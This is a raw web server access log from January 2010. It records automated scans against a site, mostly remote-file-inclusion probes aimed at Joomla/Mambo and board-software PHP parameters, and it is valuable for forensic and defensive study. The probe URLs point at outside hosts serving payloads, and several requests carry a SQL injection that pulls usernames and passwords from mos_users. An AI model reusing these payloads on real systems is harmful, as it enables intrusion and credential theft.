74.55.15.194 - - [17/Jan/2010:04:37:26 -0500] "GET /logs/access_log.Q109092400%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:37:36 -0500] "GET /logs/access_log.Q109122400//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:37:56 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:37:56 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:37:56 -0500] "GET /logs/access_log.Q109121500/components/com_performs/performs.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:58 -0500] "GET /logs/access_log.Q109101800/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 324 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:58 -0500] "GET /logs/access_log.Q109082500/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 324 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:04:39:32 -0500] "GET /logs/error_log.Q109120200 HTTP/1.0" 200 2650794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [17/Jan/2010:04:40:02 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.7.77 - - [17/Jan/2010:04:40:02 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:40:03 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:40:03 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:40:03 -0500] "GET /logs/access_log.Q109112000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:40:03 -0500] "GET /logs/access_log.Q109112000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:40:04 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:40:04 -0500] "GET /logs/error_log.Q109112000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:40:05 -0500] "GET /logs/error_log.Q109112000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:04:39:39 -0500] "GET /logs/error_log.Q109120200 HTTP/1.0" 200 2650794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.7.77 - - [17/Jan/2010:04:40:07 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:40:07 -0500] "GET /logs/access_log.Q109112000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:40:09 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:40:09 -0500] "GET /logs/error_log.Q109112000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:40:11 -0500] "GET ///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:40:11 -0500] "GET /logs///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:40:12 -0500] "GET /logs/access_log.Q109102300///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:40:16 -0500] "GET /logs/access_log.Q109071900///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:40:32 -0500] "GET /logs/access_log.Q109071900///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:40:34 -0500] "GET ///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:40:34 -0500] "GET /logs///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:40:34 -0500] "GET /logs/access_log.Q109102300///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.101.214.54 - - [17/Jan/2010:04:41:03 -0500] "GET /logs////skin/zero_vote/error.php?dir=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.101.214.54 - - [17/Jan/2010:04:41:03 -0500] "GET ////skin/zero_vote/error.php?dir=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.101.214.54 - - [17/Jan/2010:04:41:03 -0500] "GET /logs/access_log.Q109093000////skin/zero_vote/error.php?dir=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:41:07 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:41:07 -0500] "GET /logs/access_log.Q109121500/components/com_performs/performs.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:41:07 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:04:41:58 -0500] "GET //appserv/main.php?appserv_root=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:04:41:58 -0500] "GET /logs/error_log.Q109120900//appserv/main.php?appserv_root=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:04:41:58 -0500] "GET /logs//appserv/main.php?appserv_root=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:41:58 -0500] "GET /logs/error_log.Q109121500/components/com_performs/performs.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:04:42:04 -0500] "GET /logs/error_log.Q109050700//appserv/main.php?appserv_root=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:42:16 -0500] "GET /logs/error_log.Q109121500/components/com_performs/performs.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:42:36 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:42:36 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:42:46 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:42:46 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.62.128.254 - - [17/Jan/2010:04:43:08 -0500] "GET /logs/access_log.Q109100400%20%20//skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.62.128.254 - - [17/Jan/2010:04:43:13 -0500] "GET /logs/access_log.Q109072200%20%20//skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:43:24 -0500] "GET /logs/error_log.Q109112000%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:43:25 -0500] "GET /logs/access_log.Q109112000%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:43:31 -0500] "GET /logs/access_log.Q109112000%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:43:31 -0500] "GET /logs/error_log.Q109112000%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:43:34 -0500] "GET /logs/access_log.Q109112000%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:43:35 -0500] "GET /logs/error_log.Q109112000%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:43:41 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:43:41 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:44:09 -0500] "GET /logs/access_log.Q109122400//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:44:17 -0500] "GET /logs/access_log.Q109122400//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:04:45:14 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.62.128.254 - - [17/Jan/2010:04:45:45 -0500] "GET /logs/access_log.Q109100400%20%20//skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.62.128.254 - - [17/Jan/2010:04:45:48 -0500] "GET /logs/access_log.Q109072200%20%20//skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
38.99.70.210 - - [17/Jan/2010:04:46:03 -0500] "GET /logs/access_log.Q109061100/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*' HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
38.99.70.210 - - [17/Jan/2010:04:46:03 -0500] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*' HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
38.99.70.210 - - [17/Jan/2010:04:46:03 -0500] "GET /logs/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*' HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
95.108.128.242 - - [17/Jan/2010:04:46:15 -0500] "GET /logs/access_log.Q109061200 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
123.125.66.124 - - [17/Jan/2010:04:47:26 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [17/Jan/2010:04:50:19 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.142 - - [17/Jan/2010:04:51:38 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L014C325B11F298001A9C07M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
86.109.170.73 - - [17/Jan/2010:04:52:24 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:52:24 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:52:24 -0500] "GET /logs/access_log.Q109111600%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:52:58 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:52:58 -0500] "GET /logs/access_log.Q109111600//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:52:58 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:52:58 -0500] "GET /logs/access_log.Q109081000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:53:04 -0500] "GET /logs/access_log.Q109081000%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:04:53:25 -0500] "GET //include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:04:53:25 -0500] "GET /logs//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:54:37 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:54:37 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:54:37 -0500] "GET /logs/access_log.Q109111600//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:54:43 -0500] "GET /logs/access_log.Q109081000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:04:55:25 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.103.72.130 - - [17/Jan/2010:04:55:53 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://rita-kernn-larsen.com//administrator/modules/mod_online/test.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
83.103.72.130 - - [17/Jan/2010:04:55:53 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://rita-kernn-larsen.com//administrator/modules/mod_online/test.txt?? HTTP/1.1" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
211.214.161.205 - - [17/Jan/2010:04:55:59 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.214.161.205 - - [17/Jan/2010:04:55:59 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
74.55.15.194 - - [17/Jan/2010:04:56:52 -0500] "GET /logs/access_log.Q109061400/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 286 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:56:52 -0500] "GET /t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 259 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:56:52 -0500] "GET /logs/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 264 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:56:53 -0500] "GET /logs/access_log.Q109061400/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 286 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:56:54 -0500] "GET /t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 259 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:56:54 -0500] "GET /logs/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 264 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:56:54 -0500] "GET /logs/access_log.Q109061400/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 286 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:56:54 -0500] "GET /t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 259 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:56:57 -0500] "GET /logs/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 264 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:57:09 -0500] "GET /logs/access_log.Q109061400/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 286 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:57:10 -0500] "GET /t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 259 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:57:10 -0500] "GET /logs/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 264 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:57:25 -0500] "GET /logs/access_log.Q109090700/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 286 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:57:27 -0500] "GET /logs/access_log.Q109090700/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 286 "-" "libwww-perl/5.834"
74.55.15.194 - - [17/Jan/2010:04:57:29 -0500] "GET /logs/access_log.Q109090700/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 286 "-" "libwww-perl/5.834"
211.206.120.187 - - [17/Jan/2010:04:57:42 -0500] "GET //delete.php?board_skin_path=http://www.avto-x.ru//banners/test.gif?? HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
211.206.120.187 - - [17/Jan/2010:04:57:42 -0500] "GET /logs//delete.php?board_skin_path=http://www.avto-x.ru//banners/test.gif?? HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
210.94.164.28 - - [17/Jan/2010:04:57:55 -0500] "GET //delete_all.php?board_skin_path=http://www.carex.co.kr/data/rs/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
210.94.164.28 - - [17/Jan/2010:04:57:55 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.carex.co.kr/data/rs/test.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
74.55.15.194 - - [17/Jan/2010:04:57:55 -0500] "GET /logs/access_log.Q109090700/t/index.phphttp://www.hfsb.org/sites/10225/img/.patch/idd.swf?? HTTP/1.1" 404 286 "-" "libwww-perl/5.834"
66.249.68.142 - - [17/Jan/2010:04:58:53 -0500] "GET /images/ace_logo_top.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
86.109.170.73 - - [17/Jan/2010:04:59:18 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:59:18 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:59:18 -0500] "GET /logs/access_log.Q109081000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:05:00:34 -0500] "GET /logs/error_log.Q109071200 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.59.12.99 - - [17/Jan/2010:05:00:43 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.109.170.73 - - [17/Jan/2010:05:01:02 -0500] "GET /logs/access_log.Q109072200//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:05:03:18 -0500] "GET //login.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:05:03:18 -0500] "GET /logs//login.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:05:03:49 -0500] "GET /logs//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:05:03:49 -0500] "GET //include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:05:03:49 -0500] "GET /logs/access_log.Q109061300%20%20//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:05:04:33 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:05:04:33 -0500] "GET //skin/zero_vote/error.php?dir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:05:04:33 -0500] "GET //skin/zero_vote/error.php?dir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:05:04:33 -0500] "GET /logs/access_log.Q109092100//skin/zero_vote/error.php?dir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:05:04:33 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:05:04:33 -0500] "GET /logs/access_log.Q109092100//skin/zero_vote/error.php?dir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:05:04:50 -0500] "GET /logs/access_log.Q109092100%20%20//skin/zero_vote/error.php?dir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:05:04:50 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:05:04:50 -0500] "GET //skin/zero_vote/error.php?dir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:05:04:50 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
